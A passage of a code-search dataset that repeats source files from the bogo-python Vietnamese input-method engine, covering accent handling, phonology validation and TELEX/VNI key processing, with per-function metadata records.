# at the end of new_bogo_engine.transform()
from __future__ import unicode_literals
from bogo import utils
class Accent:
GRAVE = 5
ACUTE = 4
HOOK = 3
TIDLE = 2
DOT = 1
NONE = 0
def get_accent_string(string):
"""
Get the first accent from the right of a string.
"""
accents = list(filter(lambda accent: accent != Accent.NONE,
map(get_accent_char, string)))
return accents[-1] if accents else Accent.NONE
def add_accent(components, accent):
"""
Add accent to the given components. The parameter components is
the result of function separate()
"""
vowel = components[1]
last_consonant = components[2]
if accent == Accent.NONE:
vowel = remove_accent_string(vowel)
return [components[0], vowel, last_consonant]
if vowel == "":
return components
#raw_string is a list, not a str object
raw_string = remove_accent_string(vowel).lower()
new_vowel = ""
# Highest priority for ê and ơ
index = max(raw_string.find("ê"), raw_string.find("ơ"))
if index != -1:
new_vowel = vowel[:index] + add_accent_char(vowel[index], accent) + vowel[index+1:]
elif len(vowel) == 1 or (len(vowel) == 2 and last_consonant == ""):
new_vowel = add_accent_char(vowel[0], accent) + vowel[1:]
else:
new_vowel = vowel[:1] + add_accent_char(vowel[1], accent) + vowel[2:]
return [components[0], new_vowel, components[2]]
def add_accent_char(char, accent):
"""
Add accent to a single char. Parameter accent is member of class
Accent
"""
if char == "":
return ""
case = char.isupper()
char = char.lower()
index = utils.VOWELS.find(char)
if (index != -1):
index = index - index % 6 + 5
char = utils.VOWELS[index - accent]
return utils.change_case(char, case)
def add_accent_at(string, accent, index):
"""
Add mark to the index-th character of the given string. Return
the new string after applying change.
(unused)
"""
if index == -1:
return string
# Python can handle the case which index is out of range of given string
return string[:index] + \
accent.accent.add_accent_char(string[index], accent) + \
string[index+1:]
def remove_accent_char(char):
"""
Remove accent from a single char, if any.
"""
return add_accent_char(char, Accent.NONE)
def remove_accent_string(string):
"""
Remove all accent from a whole string.
"""
return utils.join([add_accent_char(c, Accent.NONE) for c in string])
|
BoGoEngine/bogo-python | bogo/accent.py | get_accent_string | python | def get_accent_string(string):
accents = list(filter(lambda accent: accent != Accent.NONE,
map(get_accent_char, string)))
return accents[-1] if accents else Accent.NONE | Get the first accent from the right of a string. | train | https://github.com/BoGoEngine/bogo-python/blob/9b85329a408ded4cead3539cecba12984d5d7650/bogo/accent.py#L56-L62 | null | # -*- coding: utf-8 -*-
#
# This file is part of ibus-bogo project.
#
# Copyright (C) 2012 Long T. Dam <longdt90@gmail.com>
# Copyright (C) 2012-2013 Trung Ngo <ndtrung4419@gmail.com>
# Copyright (C) 2013 Duong H. Nguyen <cmpitg@gmail.com>
#
# ibus-bogo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ibus-bogo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with ibus-bogo. If not, see <http://www.gnu.org/licenses/>.
#
"""
Utility functions to deal with accents (should have been called tones),
which are diacritical markings that changes the pitch of a character.
E.g. the acute accent in á.
"""
# TODO: add is_valid_accent() to be on par with mark.py and use it
# at the end of new_bogo_engine.transform()
from __future__ import unicode_literals
from bogo import utils
class Accent:
GRAVE = 5
ACUTE = 4
HOOK = 3
TIDLE = 2
DOT = 1
NONE = 0
def get_accent_char(char):
"""
Get the accent of an single char, if any.
"""
index = utils.VOWELS.find(char.lower())
if (index != -1):
return 5 - index % 6
else:
return Accent.NONE
def add_accent(components, accent):
"""
Add accent to the given components. The parameter components is
the result of function separate()
"""
vowel = components[1]
last_consonant = components[2]
if accent == Accent.NONE:
vowel = remove_accent_string(vowel)
return [components[0], vowel, last_consonant]
if vowel == "":
return components
#raw_string is a list, not a str object
raw_string = remove_accent_string(vowel).lower()
new_vowel = ""
# Highest priority for ê and ơ
index = max(raw_string.find("ê"), raw_string.find("ơ"))
if index != -1:
new_vowel = vowel[:index] + add_accent_char(vowel[index], accent) + vowel[index+1:]
elif len(vowel) == 1 or (len(vowel) == 2 and last_consonant == ""):
new_vowel = add_accent_char(vowel[0], accent) + vowel[1:]
else:
new_vowel = vowel[:1] + add_accent_char(vowel[1], accent) + vowel[2:]
return [components[0], new_vowel, components[2]]
def add_accent_char(char, accent):
"""
Add accent to a single char. Parameter accent is member of class
Accent
"""
if char == "":
return ""
case = char.isupper()
char = char.lower()
index = utils.VOWELS.find(char)
if (index != -1):
index = index - index % 6 + 5
char = utils.VOWELS[index - accent]
return utils.change_case(char, case)
def add_accent_at(string, accent, index):
"""
Add mark to the index-th character of the given string. Return
the new string after applying change.
(unused)
"""
if index == -1:
return string
# Python can handle the case which index is out of range of given string
return string[:index] + \
accent.accent.add_accent_char(string[index], accent) + \
string[index+1:]
def remove_accent_char(char):
"""
Remove accent from a single char, if any.
"""
return add_accent_char(char, Accent.NONE)
def remove_accent_string(string):
"""
Remove all accent from a whole string.
"""
return utils.join([add_accent_char(c, Accent.NONE) for c in string])
|
BoGoEngine/bogo-python | bogo/accent.py | add_accent | python | def add_accent(components, accent):
vowel = components[1]
last_consonant = components[2]
if accent == Accent.NONE:
vowel = remove_accent_string(vowel)
return [components[0], vowel, last_consonant]
if vowel == "":
return components
#raw_string is a list, not a str object
raw_string = remove_accent_string(vowel).lower()
new_vowel = ""
# Highest priority for ê and ơ
index = max(raw_string.find("ê"), raw_string.find("ơ"))
if index != -1:
new_vowel = vowel[:index] + add_accent_char(vowel[index], accent) + vowel[index+1:]
elif len(vowel) == 1 or (len(vowel) == 2 and last_consonant == ""):
new_vowel = add_accent_char(vowel[0], accent) + vowel[1:]
else:
new_vowel = vowel[:1] + add_accent_char(vowel[1], accent) + vowel[2:]
return [components[0], new_vowel, components[2]] | Add accent to the given components. The parameter components is
the result of function separate() | train | https://github.com/BoGoEngine/bogo-python/blob/9b85329a408ded4cead3539cecba12984d5d7650/bogo/accent.py#L65-L89 | [
"def remove_accent_string(string):\n \"\"\"\n Remove all accent from a whole string.\n \"\"\"\n return utils.join([add_accent_char(c, Accent.NONE) for c in string])\n",
"def add_accent_char(char, accent):\n \"\"\"\n Add accent to a single char. Parameter accent is member of class\n Accent\n ... | # -*- coding: utf-8 -*-
#
# This file is part of ibus-bogo project.
#
# Copyright (C) 2012 Long T. Dam <longdt90@gmail.com>
# Copyright (C) 2012-2013 Trung Ngo <ndtrung4419@gmail.com>
# Copyright (C) 2013 Duong H. Nguyen <cmpitg@gmail.com>
#
# ibus-bogo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ibus-bogo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with ibus-bogo. If not, see <http://www.gnu.org/licenses/>.
#
"""
Utility functions to deal with accents (should have been called tones),
which are diacritical markings that changes the pitch of a character.
E.g. the acute accent in á.
"""
# TODO: add is_valid_accent() to be on par with mark.py and use it
# at the end of new_bogo_engine.transform()
from __future__ import unicode_literals
from bogo import utils
class Accent:
GRAVE = 5
ACUTE = 4
HOOK = 3
TIDLE = 2
DOT = 1
NONE = 0
def get_accent_char(char):
"""
Get the accent of an single char, if any.
"""
index = utils.VOWELS.find(char.lower())
if (index != -1):
return 5 - index % 6
else:
return Accent.NONE
def get_accent_string(string):
"""
Get the first accent from the right of a string.
"""
accents = list(filter(lambda accent: accent != Accent.NONE,
map(get_accent_char, string)))
return accents[-1] if accents else Accent.NONE
def add_accent_char(char, accent):
"""
Add accent to a single char. Parameter accent is member of class
Accent
"""
if char == "":
return ""
case = char.isupper()
char = char.lower()
index = utils.VOWELS.find(char)
if (index != -1):
index = index - index % 6 + 5
char = utils.VOWELS[index - accent]
return utils.change_case(char, case)
def add_accent_at(string, accent, index):
"""
Add mark to the index-th character of the given string. Return
the new string after applying change.
(unused)
"""
if index == -1:
return string
# Python can handle the case which index is out of range of given string
return string[:index] + \
accent.accent.add_accent_char(string[index], accent) + \
string[index+1:]
def remove_accent_char(char):
"""
Remove accent from a single char, if any.
"""
return add_accent_char(char, Accent.NONE)
def remove_accent_string(string):
"""
Remove all accent from a whole string.
"""
return utils.join([add_accent_char(c, Accent.NONE) for c in string])
|
BoGoEngine/bogo-python | bogo/accent.py | add_accent_char | python | def add_accent_char(char, accent):
if char == "":
return ""
case = char.isupper()
char = char.lower()
index = utils.VOWELS.find(char)
if (index != -1):
index = index - index % 6 + 5
char = utils.VOWELS[index - accent]
return utils.change_case(char, case) | Add accent to a single char. Parameter accent is member of class
Accent | train | https://github.com/BoGoEngine/bogo-python/blob/9b85329a408ded4cead3539cecba12984d5d7650/bogo/accent.py#L92-L105 | [
"def change_case(string, case):\n \"\"\"\n Helper: Return new string obtained from change the given string to\n desired case.\n\n Args\n string\n case - 0: lower, 1: upper\n \"\"\"\n return string.upper() if case else string.lower()\n"
] | # -*- coding: utf-8 -*-
#
# This file is part of ibus-bogo project.
#
# Copyright (C) 2012 Long T. Dam <longdt90@gmail.com>
# Copyright (C) 2012-2013 Trung Ngo <ndtrung4419@gmail.com>
# Copyright (C) 2013 Duong H. Nguyen <cmpitg@gmail.com>
#
# ibus-bogo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ibus-bogo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with ibus-bogo. If not, see <http://www.gnu.org/licenses/>.
#
"""
Utility functions to deal with accents (should have been called tones),
which are diacritical markings that changes the pitch of a character.
E.g. the acute accent in á.
"""
# TODO: add is_valid_accent() to be on par with mark.py and use it
# at the end of new_bogo_engine.transform()
from __future__ import unicode_literals
from bogo import utils
class Accent:
GRAVE = 5
ACUTE = 4
HOOK = 3
TIDLE = 2
DOT = 1
NONE = 0
def get_accent_char(char):
"""
Get the accent of an single char, if any.
"""
index = utils.VOWELS.find(char.lower())
if (index != -1):
return 5 - index % 6
else:
return Accent.NONE
def get_accent_string(string):
"""
Get the first accent from the right of a string.
"""
accents = list(filter(lambda accent: accent != Accent.NONE,
map(get_accent_char, string)))
return accents[-1] if accents else Accent.NONE
def add_accent(components, accent):
"""
Add accent to the given components. The parameter components is
the result of function separate()
"""
vowel = components[1]
last_consonant = components[2]
if accent == Accent.NONE:
vowel = remove_accent_string(vowel)
return [components[0], vowel, last_consonant]
if vowel == "":
return components
#raw_string is a list, not a str object
raw_string = remove_accent_string(vowel).lower()
new_vowel = ""
# Highest priority for ê and ơ
index = max(raw_string.find("ê"), raw_string.find("ơ"))
if index != -1:
new_vowel = vowel[:index] + add_accent_char(vowel[index], accent) + vowel[index+1:]
elif len(vowel) == 1 or (len(vowel) == 2 and last_consonant == ""):
new_vowel = add_accent_char(vowel[0], accent) + vowel[1:]
else:
new_vowel = vowel[:1] + add_accent_char(vowel[1], accent) + vowel[2:]
return [components[0], new_vowel, components[2]]
def add_accent_at(string, accent, index):
"""
Add mark to the index-th character of the given string. Return
the new string after applying change.
(unused)
"""
if index == -1:
return string
# Python can handle the case which index is out of range of given string
return string[:index] + \
accent.accent.add_accent_char(string[index], accent) + \
string[index+1:]
def remove_accent_char(char):
"""
Remove accent from a single char, if any.
"""
return add_accent_char(char, Accent.NONE)
def remove_accent_string(string):
"""
Remove all accent from a whole string.
"""
return utils.join([add_accent_char(c, Accent.NONE) for c in string])
|
BoGoEngine/bogo-python | bogo/accent.py | add_accent_at | python | def add_accent_at(string, accent, index):
if index == -1:
return string
# Python can handle the case which index is out of range of given string
return string[:index] + \
accent.accent.add_accent_char(string[index], accent) + \
string[index+1:] | Add mark to the index-th character of the given string. Return
the new string after applying change.
(unused) | train | https://github.com/BoGoEngine/bogo-python/blob/9b85329a408ded4cead3539cecba12984d5d7650/bogo/accent.py#L108-L119 | null | # -*- coding: utf-8 -*-
#
# This file is part of ibus-bogo project.
#
# Copyright (C) 2012 Long T. Dam <longdt90@gmail.com>
# Copyright (C) 2012-2013 Trung Ngo <ndtrung4419@gmail.com>
# Copyright (C) 2013 Duong H. Nguyen <cmpitg@gmail.com>
#
# ibus-bogo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ibus-bogo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with ibus-bogo. If not, see <http://www.gnu.org/licenses/>.
#
"""
Utility functions to deal with accents (should have been called tones),
which are diacritical markings that changes the pitch of a character.
E.g. the acute accent in á.
"""
# TODO: add is_valid_accent() to be on par with mark.py and use it
# at the end of new_bogo_engine.transform()
from __future__ import unicode_literals
from bogo import utils
class Accent:
GRAVE = 5
ACUTE = 4
HOOK = 3
TIDLE = 2
DOT = 1
NONE = 0
def get_accent_char(char):
"""
Get the accent of an single char, if any.
"""
index = utils.VOWELS.find(char.lower())
if (index != -1):
return 5 - index % 6
else:
return Accent.NONE
def get_accent_string(string):
"""
Get the first accent from the right of a string.
"""
accents = list(filter(lambda accent: accent != Accent.NONE,
map(get_accent_char, string)))
return accents[-1] if accents else Accent.NONE
def add_accent(components, accent):
"""
Add accent to the given components. The parameter components is
the result of function separate()
"""
vowel = components[1]
last_consonant = components[2]
if accent == Accent.NONE:
vowel = remove_accent_string(vowel)
return [components[0], vowel, last_consonant]
if vowel == "":
return components
#raw_string is a list, not a str object
raw_string = remove_accent_string(vowel).lower()
new_vowel = ""
# Highest priority for ê and ơ
index = max(raw_string.find("ê"), raw_string.find("ơ"))
if index != -1:
new_vowel = vowel[:index] + add_accent_char(vowel[index], accent) + vowel[index+1:]
elif len(vowel) == 1 or (len(vowel) == 2 and last_consonant == ""):
new_vowel = add_accent_char(vowel[0], accent) + vowel[1:]
else:
new_vowel = vowel[:1] + add_accent_char(vowel[1], accent) + vowel[2:]
return [components[0], new_vowel, components[2]]
def add_accent_char(char, accent):
"""
Add accent to a single char. Parameter accent is member of class
Accent
"""
if char == "":
return ""
case = char.isupper()
char = char.lower()
index = utils.VOWELS.find(char)
if (index != -1):
index = index - index % 6 + 5
char = utils.VOWELS[index - accent]
return utils.change_case(char, case)
def remove_accent_char(char):
"""
Remove accent from a single char, if any.
"""
return add_accent_char(char, Accent.NONE)
def remove_accent_string(string):
"""
Remove all accent from a whole string.
"""
return utils.join([add_accent_char(c, Accent.NONE) for c in string])
|
BoGoEngine/bogo-python | bogo/accent.py | remove_accent_string | python | def remove_accent_string(string):
return utils.join([add_accent_char(c, Accent.NONE) for c in string]) | Remove all accent from a whole string. | train | https://github.com/BoGoEngine/bogo-python/blob/9b85329a408ded4cead3539cecba12984d5d7650/bogo/accent.py#L129-L133 | [
"def join(alist):\n return \"\".join(alist)\n"
] | # -*- coding: utf-8 -*-
#
# This file is part of ibus-bogo project.
#
# Copyright (C) 2012 Long T. Dam <longdt90@gmail.com>
# Copyright (C) 2012-2013 Trung Ngo <ndtrung4419@gmail.com>
# Copyright (C) 2013 Duong H. Nguyen <cmpitg@gmail.com>
#
# ibus-bogo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ibus-bogo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with ibus-bogo. If not, see <http://www.gnu.org/licenses/>.
#
"""
Utility functions to deal with accents (should have been called tones),
which are diacritical markings that changes the pitch of a character.
E.g. the acute accent in á.
"""
# TODO: add is_valid_accent() to be on par with mark.py and use it
# at the end of new_bogo_engine.transform()
from __future__ import unicode_literals
from bogo import utils
class Accent:
GRAVE = 5
ACUTE = 4
HOOK = 3
TIDLE = 2
DOT = 1
NONE = 0
def get_accent_char(char):
"""
Get the accent of an single char, if any.
"""
index = utils.VOWELS.find(char.lower())
if (index != -1):
return 5 - index % 6
else:
return Accent.NONE
def get_accent_string(string):
"""
Get the first accent from the right of a string.
"""
accents = list(filter(lambda accent: accent != Accent.NONE,
map(get_accent_char, string)))
return accents[-1] if accents else Accent.NONE
def add_accent(components, accent):
"""
Add accent to the given components. The parameter components is
the result of function separate()
"""
vowel = components[1]
last_consonant = components[2]
if accent == Accent.NONE:
vowel = remove_accent_string(vowel)
return [components[0], vowel, last_consonant]
if vowel == "":
return components
#raw_string is a list, not a str object
raw_string = remove_accent_string(vowel).lower()
new_vowel = ""
# Highest priority for ê and ơ
index = max(raw_string.find("ê"), raw_string.find("ơ"))
if index != -1:
new_vowel = vowel[:index] + add_accent_char(vowel[index], accent) + vowel[index+1:]
elif len(vowel) == 1 or (len(vowel) == 2 and last_consonant == ""):
new_vowel = add_accent_char(vowel[0], accent) + vowel[1:]
else:
new_vowel = vowel[:1] + add_accent_char(vowel[1], accent) + vowel[2:]
return [components[0], new_vowel, components[2]]
def add_accent_char(char, accent):
"""
Add accent to a single char. Parameter accent is member of class
Accent
"""
if char == "":
return ""
case = char.isupper()
char = char.lower()
index = utils.VOWELS.find(char)
if (index != -1):
index = index - index % 6 + 5
char = utils.VOWELS[index - accent]
return utils.change_case(char, case)
def add_accent_at(string, accent, index):
"""
Add mark to the index-th character of the given string. Return
the new string after applying change.
(unused)
"""
if index == -1:
return string
# Python can handle the case which index is out of range of given string
return string[:index] + \
accent.accent.add_accent_char(string[index], accent) + \
string[index+1:]
def remove_accent_char(char):
"""
Remove accent from a single char, if any.
"""
return add_accent_char(char, Accent.NONE)
|
BoGoEngine/bogo-python | bogo/validation.py | is_valid_sound_tuple | python | def is_valid_sound_tuple(sound_tuple, final_form=True):
# We only work with lower case
sound_tuple = SoundTuple._make([s.lower() for s in sound_tuple])
# Words with no vowel are always valid
# FIXME: This looks like it should be toggled by a config key.
if not sound_tuple.vowel:
result = True
elif final_form:
result = \
has_valid_consonants(sound_tuple) and \
has_valid_vowel(sound_tuple) and \
has_valid_accent(sound_tuple)
else:
result = \
has_valid_consonants(sound_tuple) and \
has_valid_vowel_non_final(sound_tuple)
return result | Check if a character combination complies to Vietnamese phonology.
The basic idea is that if one can pronunce a sound_tuple then it's valid.
Sound tuples containing consonants exclusively (almost always
abbreviations) are also valid.
Input:
sound_tuple - a SoundTuple
final_form - whether the tuple represents a complete word
Output:
True if the tuple seems to be Vietnamese, False otherwise. | train | https://github.com/BoGoEngine/bogo-python/blob/9b85329a408ded4cead3539cecba12984d5d7650/bogo/validation.py#L84-L115 | null | # -*- coding: utf-8 -*-
#
# This file is part of ibus-bogo project.
#
# Copyright (C) 2012 Long T. Dam <longdt90@gmail.com>
# Copyright (C) 2012-2013 Trung Ngo <ndtrung4419@gmail.com>
# Copyright (C) 2013 Duong H. Nguyen <cmpitg@gmail.com>
#
# ibus-bogo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ibus-bogo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with ibus-bogo. If not, see <http://www.gnu.org/licenses/>.
#
"""
Utility functions to check whether a word looks like Vietnamese
or not (i.e. can be pronounced by a Vietnamese speaker).
"""
from __future__ import unicode_literals
import collections
from bogo import accent, mark, utils
Accent = accent.Accent
# Auto-generated lists from dictionary
# FIXME:
# Think about words composed entirely of vowels, like 'yá'.
# Perhaps let the user customize these lists?
CONSONANTS = set([
'b', 'c', 'ch', 'd', 'g', 'gh', 'gi', 'h', 'k', 'kh', 'l', 'm', 'n', 'ng',
'ngh', 'nh', 'p', 'ph', 'qu', 'r', 's', 't', 'th', 'tr', 'v', 'x', 'đ'
])
TERMINAL_CONSONANTS = set([
'c', 'ch', 'm', 'n', 'ng', 'nh', 'p', 't'
])
VOWELS = set([
'a', 'ai', 'ao', 'au', 'ay', 'e', 'eo', 'i', 'ia', 'iu', 'iê', 'iêu',
'o', 'oa', 'oai', 'oao', 'oay', 'oe', 'oeo', 'oi', 'oo', 'oă', 'u', 'ua',
'ui', 'uy', 'uya', 'uyu', 'uyê', 'uâ', 'uây', 'uê', 'uô', 'uôi',
'uơ', 'y', 'yê', 'yêu', 'â', 'âu', 'ây', 'ê', 'êu', 'ô', 'ôi',
'ă', 'ơ', 'ơi', 'ư', 'ưa', 'ưi', 'ưu', 'ươ', 'ươi', 'ươu'
])
TERMINAL_VOWELS = set([
'ai', 'ao', 'au', 'ay', 'eo', 'ia', 'iu', 'iêu', 'oai', 'oao', 'oay',
'oeo', 'oi', 'ua', 'ui', 'uya', 'uyu', 'uây', 'uôi', 'uơ', 'yêu', 'âu',
'ây', 'êu', 'ôi', 'ơi', 'ưa', 'ưi', 'ưu', 'ươi', 'ươu'
])
STRIPPED_VOWELS = set(map(mark.strip, VOWELS))
# 'uo' may clash with 'ươ' and prevent typing 'thương'
# 'ua' may clash with 'uâ' and prevent typing 'luật'
STRIPPED_TERMINAL_VOWELS = set(map(mark.strip, TERMINAL_VOWELS)) - \
set(['uo', 'ua'])
SoundTuple = \
collections.namedtuple('SoundTuple',
['first_consonant', 'vowel', 'last_consonant'])
def is_valid_string(string, final_form=True):
return is_valid_combination(utils.separate(string), final_form)
def is_valid_combination(comp, final_form=True):
return is_valid_sound_tuple(comp, final_form)
def has_valid_consonants(sound_tuple):
def has_invalid_first_consonant():
return (sound_tuple.first_consonant != "" and
not sound_tuple.first_consonant in CONSONANTS)
def has_invalid_last_consonant():
return (sound_tuple.last_consonant != "" and
not sound_tuple.last_consonant in TERMINAL_CONSONANTS)
return not (has_invalid_first_consonant() or
has_invalid_last_consonant())
def has_valid_vowel_non_final(sound_tuple):
# If the sound_tuple is not complete, we only care whether its vowel
# position can be transformed into a legit vowel.
stripped_vowel = mark.strip(sound_tuple.vowel)
if sound_tuple.last_consonant != '':
return stripped_vowel in STRIPPED_VOWELS - STRIPPED_TERMINAL_VOWELS
else:
return stripped_vowel in STRIPPED_VOWELS
def has_valid_vowel(sound_tuple):
# Check our vowel.
# First remove all accents
vowel_wo_accent = accent.remove_accent_string(sound_tuple.vowel)
def has_valid_vowel_form():
return vowel_wo_accent in VOWELS and not \
(sound_tuple.last_consonant != '' and
vowel_wo_accent in TERMINAL_VOWELS)
def has_valid_ch_ending():
# 'ch' can only go after a, ê, uê, i, uy, oa
return not (sound_tuple.last_consonant == 'ch' and
not vowel_wo_accent in
('a', 'ê', 'uê', 'i', 'uy', 'oa'))
def has_valid_c_ending():
# 'c' can't go after 'i' or 'ơ'
return not (sound_tuple.last_consonant == 'c' and
vowel_wo_accent in ('i', 'ơ'))
def has_valid_ng_ending():
# 'ng' can't go after i, ơ
return not (sound_tuple.last_consonant == 'ng' and
vowel_wo_accent in ('i', 'ơ'))
def has_valid_nh_ending():
# 'nh' can only go after a, ê, uy, i, oa, quy
has_y_but_is_not_quynh = vowel_wo_accent == 'y' and \
sound_tuple.first_consonant != 'qu'
has_invalid_vowel = not vowel_wo_accent in \
('a', 'ê', 'i', 'uy', 'oa', 'uê', 'y')
return not \
(sound_tuple.last_consonant == 'nh' and
(has_invalid_vowel or has_y_but_is_not_quynh))
# The ng and nh rules are not really phonetic but spelling rules.
# Including them may hinder typing freedom and may prevent typing
# unique local names.
# FIXME: Config key, anyone?
return \
has_valid_vowel_form() and \
has_valid_ch_ending() and \
has_valid_c_ending()
# has_valid_ng_ending() and \
# has_valid_nh_ending()
def has_valid_accent(sound_tuple):
akzent = accent.get_accent_string(sound_tuple.vowel)
# These consonants can only go with ACUTE, DOT accents
return not (sound_tuple.last_consonant in ('c', 'p', 't', 'ch') and
not akzent in (Accent.ACUTE, Accent.DOT))
|
BoGoEngine/bogo-python | bogo/core.py | get_telex_definition | python | def get_telex_definition(w_shorthand=True, brackets_shorthand=True):
telex = {
"a": "a^",
"o": "o^",
"e": "e^",
"w": ["u*", "o*", "a+"],
"d": "d-",
"f": "\\",
"s": "/",
"r": "?",
"x": "~",
"j": ".",
}
if w_shorthand:
telex["w"].append('<ư')
if brackets_shorthand:
telex.update({
"]": "<ư",
"[": "<ơ",
"}": "<Ư",
"{": "<Ơ"
})
return telex | Create a definition dictionary for the TELEX input method
Args:
w_shorthand (optional): allow a stand-alone w to be
interpreted as an ư. Default to True.
brackets_shorthand (optional, True): allow typing ][ as
shorthand for ươ. Default to True.
Returns a dictionary to be passed into process_key(). | train | https://github.com/BoGoEngine/bogo-python/blob/9b85329a408ded4cead3539cecba12984d5d7650/bogo/core.py#L46-L81 | null | # -*- coding: utf-8 -*-
#
# This file is part of ibus-bogo project.
#
# Copyright (C) 2012 Long T. Dam <longdt90@gmail.com>
# Copyright (C) 2012-2013 Trung Ngo <ndtrung4419@gmail.com>
# Copyright (C) 2013 Duong H. Nguyen <cmpitg@gmail.com>
#
# ibus-bogo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ibus-bogo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with ibus-bogo. If not, see <http://www.gnu.org/licenses/>.
#
"""
Read the docstring for process_sequence() and process_key() first.
"""
from __future__ import unicode_literals
from bogo.validation import is_valid_combination
from bogo import utils, accent, mark
import logging
import sys
import string
Mark = mark.Mark
Accent = accent.Accent
class _Action:
UNDO = 3
ADD_MARK = 2
ADD_ACCENT = 1
ADD_CHAR = 0
def get_vni_definition():
"""Create a definition dictionary for the VNI input method.
Returns a dictionary to be passed into process_key().
"""
return {
"6": ["a^", "o^", "e^"],
"7": ["u*", "o*"],
"8": "a+",
"9": "d-",
"2": "\\",
"1": "/",
"3": "?",
"4": "~",
"5": "."
}
def _accepted_chars(rules):
if sys.version_info[0] > 2:
ascii_letters = \
string.ascii_letters
else:
ascii_letters = \
string.lowercase + \
string.uppercase
return set(ascii_letters + ''.join(rules.keys()) + utils.VOWELS + "đ")
def process_sequence(sequence,
rules=None,
skip_non_vietnamese=True):
"""\
Convert a key sequence into a Vietnamese string with diacritical marks.
Args:
rules (optional): see docstring for process_key().
skip_non_vietnamese (optional): see docstring for process_key().
It even supports continous key sequences connected by separators.
i.e. process_sequence('con meof.ddieen') should work.
"""
result = ""
raw = result
result_parts = []
if rules is None:
rules = get_telex_definition()
accepted_chars = _accepted_chars(rules)
for key in sequence:
if key not in accepted_chars:
result_parts.append(result)
result_parts.append(key)
result = ""
raw = ""
else:
result, raw = process_key(
string=result,
key=key,
fallback_sequence=raw,
rules=rules,
skip_non_vietnamese=skip_non_vietnamese)
result_parts.append(result)
return ''.join(result_parts)
def process_key(string, key,
fallback_sequence="", rules=None,
skip_non_vietnamese=True):
"""Process a keystroke.
Args:
string: The previously processed string or "".
key: The keystroke.
fallback_sequence: The previous keystrokes.
rules (optional): A dictionary listing
transformation rules. Defaults to get_telex_definition().
skip_non_vietnamese (optional): Whether to skip results that
doesn't seem like Vietnamese. Defaults to True.
Returns a tuple. The first item of which is the processed
Vietnamese string, the second item is the next fallback sequence.
The two items are to be fed back into the next call of process_key()
as `string` and `fallback_sequence`. If `skip_non_vietnamese` is
True and the resulting string doesn't look like Vietnamese,
both items contain the `fallback_sequence`.
>>> process_key('a', 'a', 'a')
(â, aa)
Note that when a key is an undo key, it won't get appended to
`fallback_sequence`.
>>> process_key('â', 'a', 'aa')
(aa, aa)
`rules` is a dictionary that maps keystrokes to
their effect string. The effects can be one of the following:
'a^': a with circumflex (â), only affect an existing 'a family'
'a+': a with breve (ă), only affect an existing 'a family'
'e^': e with circumflex (ê), only affect an existing 'e family'
'o^': o with circumflex (ô), only affect an existing 'o family'
'o*': o with horn (ơ), only affect an existing 'o family'
'd-': d with bar (đ), only affect an existing 'd'
'/': acute (sắc), affect an existing vowel
'\': grave (huyền), affect an existing vowel
'?': hook (hỏi), affect an existing vowel
'~': tilde (ngã), affect an existing vowel
'.': dot (nặng), affect an existing vowel
'<ư': append ư
'<ơ': append ơ
A keystroke entry can have multiple effects, in which case the
dictionary entry's value should be a list of the possible
effect strings. Although you should try to avoid this if
you are defining a custom input method rule.
"""
# TODO Figure out a way to remove the `string` argument. Perhaps only the
# key sequence is needed?
def default_return():
return string + key, fallback_sequence + key
if rules is None:
rules = get_telex_definition()
comps = utils.separate(string)
# if not _is_processable(comps):
# return default_return()
# Find all possible transformations this keypress can generate
trans_list = _get_transformation_list(
key, rules, fallback_sequence)
# Then apply them one by one
new_comps = list(comps)
for trans in trans_list:
new_comps = _transform(new_comps, trans)
if new_comps == comps:
tmp = list(new_comps)
# If none of the transformations (if any) work
# then this keystroke is probably an undo key.
if _can_undo(new_comps, trans_list):
# The prefix "_" means undo.
for trans in map(lambda x: "_" + x, trans_list):
new_comps = _transform(new_comps, trans)
# Undoing the w key with the TELEX input method with the
# w:<ư extension requires some care.
#
# The input (ư, w) should be undone as w
# on the other hand, (ư, uw) should return uw.
#
# _transform() is not aware of the 2 ways to generate
# ư in TELEX and always think ư was created by uw.
# Therefore, after calling _transform() to undo ư,
# we always get ['', 'u', ''].
